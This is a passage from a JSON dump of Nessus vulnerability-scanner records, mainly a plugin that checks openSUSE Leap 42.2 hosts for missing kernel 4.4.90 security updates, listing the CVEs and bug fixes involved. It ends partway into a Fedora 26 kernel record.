file->f_path.dentry->d_inode\n usage (bsc#1055896).", "edition": 19, "cvss3": {"score": 7.1, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N"}, "published": "2017-10-23T00:00:00", "title": "openSUSE Security Update : the Linux Kernel (openSUSE-2017-1159)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-14489", "CVE-2017-1000252", "CVE-2017-12153", "CVE-2017-12154"], "modified": "2017-10-23T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:kernel-source", "p-cpe:/a:novell:opensuse:kernel-source-vanilla", "p-cpe:/a:novell:opensuse:kernel-vanilla-debugsource", "p-cpe:/a:novell:opensuse:kernel-vanilla-base-debuginfo", "p-cpe:/a:novell:opensuse:kernel-debug-debuginfo", "p-cpe:/a:novell:opensuse:kernel-vanilla-debuginfo", "p-cpe:/a:novell:opensuse:kernel-default-debugsource", "p-cpe:/a:novell:opensuse:kernel-default-debuginfo", "p-cpe:/a:novell:opensuse:kernel-vanilla-base", "p-cpe:/a:novell:opensuse:kernel-debug-devel-debuginfo", "p-cpe:/a:novell:opensuse:kernel-default-devel", "p-cpe:/a:novell:opensuse:kernel-devel", "p-cpe:/a:novell:opensuse:kernel-docs-html", "p-cpe:/a:novell:opensuse:kernel-obs-qa", "p-cpe:/a:novell:opensuse:kernel-docs-pdf", "p-cpe:/a:novell:opensuse:kernel-macros", "p-cpe:/a:novell:opensuse:kernel-syms", "p-cpe:/a:novell:opensuse:kernel-vanilla", "p-cpe:/a:novell:opensuse:kernel-vanilla-devel", "p-cpe:/a:novell:opensuse:kernel-debug-base", "p-cpe:/a:novell:opensuse:kernel-debug-debugsource", "p-cpe:/a:novell:opensuse:kernel-default", "p-cpe:/a:novell:opensuse:kernel-debug-devel", "cpe:/o:novell:opensuse:42.2", "p-cpe:/a:novell:opensuse:kernel-debug-base-debuginfo", "p-cpe:/a:novell:opensuse:kernel-debug", "p-cpe:/a:novell:opensuse:kernel-obs-build-debugsource", "p-cpe:/a:novell:opensuse:kernel-default-base", "p-cpe:/a:novell:opensuse:kernel-obs-build", "p-cpe:/a:novell:opensuse:kernel-default-base-debuginfo"], "id": "OPENSUSE-2017-1159.NASL", "href": "https://www.tenable.com/plugins/nessus/104074", "sourceData": "#%NASL_MIN_LEVEL 
80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2017-1159.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104074);\n script_version(\"3.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/06/04\");\n\n script_cve_id(\"CVE-2017-1000252\", \"CVE-2017-12153\", \"CVE-2017-12154\", \"CVE-2017-14489\");\n\n script_name(english:\"openSUSE Security Update : the Linux Kernel (openSUSE-2017-1159)\");\n script_summary(english:\"Check for the openSUSE-2017-1159 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The openSUSE Leap 42.2 Kernel was updated to 4.4.90 to receive various\nsecurity and bugfixes.\n\nThe following security bugs were fixed :\n\n - CVE-2017-1000252: The KVM subsystem in the Linux kernel\n allowed guest OS users to cause a denial of service\n (assertion failure, and hypervisor hang or crash) via an\n out-of bounds guest_irq value, related to\n arch/x86/kvm/vmx.c and virt/kvm/eventfd.c (bnc#1058038).\n\n - CVE-2017-14489: The iscsi_if_rx function in\n drivers/scsi/scsi_transport_iscsi.c in the Linux kernel\n allowed local users to cause a denial of service (panic)\n by leveraging incorrect length validation (bnc#1059051).\n\n - CVE-2017-12153: A security flaw was discovered in the\n nl80211_set_rekey_data() function in\n net/wireless/nl80211.c in the Linux kernel This function\n did not check whether the required attributes are\n present in a Netlink request. 
This request can be issued\n by a user with the CAP_NET_ADMIN capability and may\n result in a NULL pointer dereference and system crash\n (bnc#1058410).\n\n - CVE-2017-12154: The prepare_vmcs02 function in\n arch/x86/kvm/vmx.c in the Linux kernel did not ensure\n that the 'CR8-load exiting' and 'CR8-store exiting' L0\n vmcs02 controls exist in cases where L1 omits the 'use\n TPR shadow' vmcs12 control, which allowed KVM L2 guest\n OS users to obtain read and write access to the hardware\n CR8 register (bnc#1058507).\n\nThe following non-security bugs were fixed :\n\n - arc: Re-enable MMU upon Machine Check exception\n (bnc#1012382).\n\n - arm64: fault: Route pte translation faults via\n do_translation_fault (bnc#1012382).\n\n - arm64: Make sure SPsel is always set (bnc#1012382).\n\n - arm: pxa: add the number of DMA requestor lines\n (bnc#1012382).\n\n - arm: pxa: fix the number of DMA requestor lines\n (bnc#1012382).\n\n - bcache: correct cache_dirty_target in\n __update_writeback_rate() (bnc#1012382).\n\n - bcache: Correct return value for sysfs attach errors\n (bnc#1012382).\n\n - bcache: do not subtract sectors_to_gc for bypassed IO\n (bnc#1012382).\n\n - bcache: fix bch_hprint crash and improve output\n (bnc#1012382).\n\n - bcache: fix for gc and write-back race (bnc#1012382).\n\n - bcache: Fix leak of bdev reference (bnc#1012382).\n\n - bcache: initialize dirty stripes in flash_dev_run()\n (bnc#1012382).\n\n - blacklist.conf: Add commit b5accbb0dfae\n\n - blacklist.conf: add one more\n\n - block: Relax a check in blk_start_queue() (bnc#1012382).\n\n - bsg-lib: do not free job in bsg_prepare_job\n (bnc#1012382).\n\n - btrfs: change how we decide to commit transactions\n during flushing (bsc#1060197).\n\n - btrfs: fix NULL pointer dereference from\n free_reloc_roots() (bnc#1012382).\n\n - btrfs: prevent to set invalid default subvolid\n (bnc#1012382).\n\n - btrfs: propagate error to btrfs_cmp_data_prepare caller\n (bnc#1012382).\n\n - btrfs: qgroup: move noisy 
underflow warning to debugging\n build (bsc#1055755).\n\n - cifs: Fix SMB3.1.1 guest authentication to Samba\n (bnc#1012382).\n\n - cifs: release auth_key.response for reconnect\n (bnc#1012382).\n\n - crypto: AF_ALG - remove SGL terminator indicator when\n chaining (bnc#1012382).\n\n - crypto: talitos - Do not provide setkey for non hmac\n hashing algs (bnc#1012382).\n\n - crypto: talitos - fix sha224 (bnc#1012382).\n\n - cxl: Fix driver use count (bnc#1012382).\n\n - dmaengine: mmp-pdma: add number of requestors\n (bnc#1012382).\n\n - drm: Add driver-private objects to atomic state\n (bsc#1055493).\n\n - drm/dp: Introduce MST topology state to track available\n link bandwidth (bsc#1055493).\n\n - ext4: fix incorrect quotaoff if the quota feature is\n enabled (bnc#1012382).\n\n - ext4: fix quota inconsistency during orphan cleanup for\n read-only mounts (bnc#1012382).\n\n - f2fs: check hot_data for roll-forward recovery\n (bnc#1012382).\n\n - fix xen_swiotlb_dma_mmap prototype (bnc#1012382).\n\n - ftrace: Fix memleak when unregistering dynamic ops when\n tracing disabled (bnc#1012382).\n\n - ftrace: Fix selftest goto location on error\n (bnc#1012382).\n\n - genirq: Fix for_each_action_of_desc() macro\n (bsc#1061064).\n\n - getcwd: Close race with d_move called by lustre\n (bsc#1052593).\n\n - gfs2: Fix debugfs glocks dump (bnc#1012382).\n\n - gianfar: Fix Tx flow control deactivation (bnc#1012382).\n\n - hid: usbhid: Add HID_QUIRK_NOGET for Aten CS-1758 KVM\n switch (bnc#1022967).\n\n - input: i8042 - add Gigabyte P57 to the keyboard reset\n table (bnc#1012382).\n\n - iommu/vt-d: Avoid calling virt_to_phys() on NULL pointer\n (bsc#1061067).\n\n - ipv6: accept 64k - 1 packet length in\n ip6_find_1stfragopt() (bnc#1012382).\n\n - ipv6: add rcu grace period before freeing fib6_node\n (bnc#1012382).\n\n - ipv6: fix memory leak with multiple tables during netns\n destruction (bnc#1012382).\n\n - ipv6: fix sparse warning on rt6i_node (bnc#1012382).\n\n - ipv6: fix typo 
in fib6_net_exit() (bnc#1012382).\n\n - kabi/severities: ignore nfs_pgio_data_destroy\n\n - keys: fix writing past end of user-supplied buffer in\n keyring_read() (bnc#1012382).\n\n - keys: prevent creating a different user's keyrings\n (bnc#1012382).\n\n - keys: prevent KEYCTL_READ on negative key (bnc#1012382).\n\n - kvm: async_pf: Fix #DF due to inject 'Page not Present'\n and 'Page Ready' exceptions simultaneously\n (bsc#1061017).\n\n - kvm: PPC: Book3S: Fix race and leak in\n kvm_vm_ioctl_create_spapr_tce() (bnc#1012382).\n\n - kvm: SVM: Add a missing 'break' statement (bsc#1061017).\n\n - kvm: VMX: do not change SN bit in vmx_update_pi_irte()\n (bsc#1061017).\n\n - kvm: VMX: remove WARN_ON_ONCE in\n kvm_vcpu_trigger_posted_interrupt (bsc#1061017).\n\n - kvm: VMX: use cmpxchg64 (bnc#1012382).\n\n - mac80211: flush hw_roc_start work before cancelling the\n ROC (bnc#1012382).\n\n - md/bitmap: disable bitmap_resize for file-backed bitmaps\n (bsc#1061172).\n\n - md/raid5: preserve STRIPE_ON_UNPLUG_LIST in\n break_stripe_batch_list (bnc#1012382).\n\n - md/raid5: release/flush io in raid5_do_work()\n (bnc#1012382).\n\n - media: uvcvideo: Prevent heap overflow when accessing\n mapped controls (bnc#1012382).\n\n - media: v4l2-compat-ioctl32: Fix timespec conversion\n (bnc#1012382).\n\n - mips: math-emu: <MAXA|MINA>.<D|S>: Fix cases of both\n infinite inputs (bnc#1012382).\n\n - mips: math-emu: <MAXA|MINA>.<D|S>: Fix cases of input\n values with opposite signs (bnc#1012382).\n\n - mips: math-emu: <MAX|MAXA|MIN|MINA>.<D|S>: Fix cases of\n both inputs zero (bnc#1012382).\n\n - mips: math-emu: <MAX|MAXA|MIN|MINA>.<D|S>: Fix quiet NaN\n propagation (bnc#1012382).\n\n - mips: math-emu: <MAX|MIN>.<D|S>: Fix cases of both\n inputs negative (bnc#1012382).\n\n - mips: math-emu: MINA.<D|S>: Fix some cases of infinity\n and zero inputs (bnc#1012382).\n\n - mm: prevent double decrease of nr_reserved_highatomic\n (bnc#1012382).\n\n - nfsd: Fix general protection fault in\n 
release_lock_stateid() (bnc#1012382).\n\n - pci: Allow PCI express root ports to find themselves\n (bsc#1061046).\n\n - pci: fix oops when try to find Root Port for a PCI\n device (bsc#1061046).\n\n - pci: Fix race condition with driver_override\n (bnc#1012382).\n\n - pci: shpchp: Enable bridge bus mastering if MSI is\n enabled (bnc#1012382).\n\n - perf/x86: Fix RDPMC vs. mm_struct tracking\n (bsc#1061831).\n\n - perf/x86: kABI Workaround for 'perf/x86: Fix RDPMC vs.\n mm_struct tracking' (bsc#1061831).\n\n - powerpc: Fix DAR reporting when alignment handler faults\n (bnc#1012382).\n\n - powerpc/pseries: Fix parent_dn reference leak in\n add_dt_node() (bnc#1012382).\n\n - qlge: avoid memcpy buffer overflow (bnc#1012382).\n\n - Revert 'net: fix percpu memory leaks' (bnc#1012382).\n\n - Revert 'net: phy: Correctly process PHY_HALTED in\n phy_stop_machine()' (bnc#1012382).\n\n - Revert 'net: use lib/percpu_counter API for\n fragmentation mem accounting' (bnc#1012382).\n\n - scsi: ILLEGAL REQUEST + ASC==27 => target failure\n (bsc#1059465).\n\n - scsi: megaraid_sas: Check valid aen class range to avoid\n kernel panic (bnc#1012382).\n\n - scsi: megaraid_sas: Return pended IOCTLs with cmd_status\n MFI_STAT_WRONG_STATE in case adapter is dead\n (bnc#1012382).\n\n - scsi: sg: factor out sg_fill_request_table()\n (bnc#1012382).\n\n - scsi: sg: fixup infoleak when using SG_GET_REQUEST_TABLE\n (bnc#1012382).\n\n - scsi: sg: off by one in sg_ioctl() (bnc#1012382).\n\n - scsi: sg: remove 'save_scat_len' (bnc#1012382).\n\n - scsi: sg: use standard lists for sg_requests\n (bnc#1012382).\n\n - scsi: storvsc: fix memory leak on ring buffer busy\n (bnc#1012382).\n\n - scsi: zfcp: add handling for FCP_RESID_OVER to the fcp\n ingress path (bnc#1012382).\n\n - scsi: zfcp: fix capping of unsuccessful GPN_FT SAN\n response trace records (bnc#1012382).\n\n - scsi: zfcp: fix missing trace records for early returns\n in TMF eh handlers (bnc#1012382).\n\n - scsi: zfcp: fix passing fsf_req to 
SCSI trace on TMF to\n correlate with HBA (bnc#1012382).\n\n - scsi: zfcp: fix payload with full FCP_RSP IU in SCSI\n trace records (bnc#1012382).\n\n - scsi: zfcp: fix queuecommand for scsi_eh commands when\n DIX enabled (bnc#1012382).\n\n - scsi: zfcp: trace HBA FSF response by default on dismiss\n or timedout late response (bnc#1012382).\n\n - scsi: zfcp: trace high part of 'new' 64 bit SCSI LUN\n (bnc#1012382).\n\n - seccomp: fix the usage of get/put_seccomp_filter() in\n seccomp_get_filter() (bnc#1012382).\n\n - skd: Avoid that module unloading triggers a\n use-after-free (bnc#1012382).\n\n - skd: Submit requests to firmware before triggering the\n doorbell (bnc#1012382).\n\n - smb3: Do not ignore O_SYNC/O_DSYNC and O_DIRECT flags\n (bnc#1012382).\n\n - smb: Validate negotiate (to protect against downgrade)\n even if signing off (bnc#1012382).\n\n - swiotlb-xen: implement xen_swiotlb_dma_mmap callback\n (bnc#1012382).\n\n - timer/sysclt: Restrict timer migration sysctl values to\n 0 and 1 (bnc#1012382).\n\n - tracing: Apply trace_clock changes to instance max\n buffer (bnc#1012382).\n\n - tracing: Erase irqsoff trace with empty write\n (bnc#1012382).\n\n - tracing: Fix trace_pipe behavior for instance traces\n (bnc#1012382).\n\n - tty: fix __tty_insert_flip_char regression\n (bnc#1012382).\n\n - tty: improve tty_insert_flip_char() fast path\n (bnc#1012382).\n\n - tty: improve tty_insert_flip_char() slow path\n (bnc#1012382).\n\n - vfs: Return -ENXIO for negative SEEK_HOLE / SEEK_DATA\n offsets (bnc#1012382).\n\n - video: fbdev: aty: do not leak uninitialized padding in\n clk to userspace (bnc#1012382).\n\n - Workaround for kABI compatibility with DP-MST patches\n (bsc#1055493).\n\n - x86/fpu: Do not let userspace set bogus xcomp_bv\n (bnc#1012382).\n\n - x86/fsgsbase/64: Report FSBASE and GSBASE correctly in\n core dumps (bnc#1012382).\n\n - x86/ldt: Fix off by one in get_segment_base()\n (bsc#1061872).\n\n - xfs/dmapi: fix incorrect 
file->f_path.dentry->d_inode\n usage (bsc#1055896).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1012382\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1022967\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1052593\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1055493\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1055755\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1055896\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1058038\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1058410\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1058507\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1059051\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1059465\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1060197\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1061017\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1061046\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1061064\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1061067\"\n );\n 
script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1061172\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1061831\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1061872\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected Linux Kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-base\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:opensuse:kernel-default-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-docs-html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-docs-pdf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-macros\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-obs-build\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-obs-build-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-obs-qa\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-source\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-source-vanilla\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-syms\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-devel\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/o:novell:opensuse:42.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-debug-4.4.90-18.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-debug-base-4.4.90-18.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-debug-base-debuginfo-4.4.90-18.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-debug-debuginfo-4.4.90-18.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-debug-debugsource-4.4.90-18.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-debug-devel-4.4.90-18.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-debug-devel-debuginfo-4.4.90-18.32.1\") ) 
flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-default-4.4.90-18.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-default-base-4.4.90-18.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-default-base-debuginfo-4.4.90-18.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-default-debuginfo-4.4.90-18.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-default-debugsource-4.4.90-18.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-default-devel-4.4.90-18.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-devel-4.4.90-18.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-docs-html-4.4.90-18.32.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-docs-pdf-4.4.90-18.32.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-macros-4.4.90-18.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-obs-build-4.4.90-18.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-obs-build-debugsource-4.4.90-18.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-obs-qa-4.4.90-18.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-source-4.4.90-18.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-source-vanilla-4.4.90-18.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-syms-4.4.90-18.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-vanilla-4.4.90-18.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-vanilla-base-4.4.90-18.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-vanilla-base-debuginfo-4.4.90-18.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-vanilla-debuginfo-4.4.90-18.32.1\") ) flag++;\nif ( 
rpm_check(release:\"SUSE42.2\", reference:\"kernel-vanilla-debugsource-4.4.90-18.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-vanilla-devel-4.4.90-18.32.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel-docs-html / kernel-docs-pdf / kernel-devel / kernel-macros / etc\");\n}\n", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-07T10:11:35", "description": "The 4.12.13 stable kernel update contains a number of important fixes\nacross the tree.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 20, "cvss3": {"score": 8.8, "vector": "AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-09-18T00:00:00", "title": "Fedora 26 : kernel (2017-7369ea045c) (BlueBorne)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-1000251", "CVE-2017-12153", "CVE-2017-12154"], "modified": "2017-09-18T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:kernel", "cpe:/o:fedoraproject:fedora:26"], "id": "FEDORA_2017-7369EA045C.NASL", "href": "https://www.tenable.com/plugins/nessus/103264", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-7369ea045c.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103264);\n script_version(\"3.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n 
script_cve_id(\"CVE-2017-1000251\", \"CVE-2017-12153\", \"CVE-2017-12154\");\n script_xref(name:\"FEDORA\", value:\"2017-7369ea045c\");\n\n script_name(english:\"Fedora 26 : kernel (2017-7369ea045c) (BlueBorne)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The 4.12.13 stable kernel update contains a number of important fixes\nacross the tree.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-7369ea045c\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:26\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/09/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", 
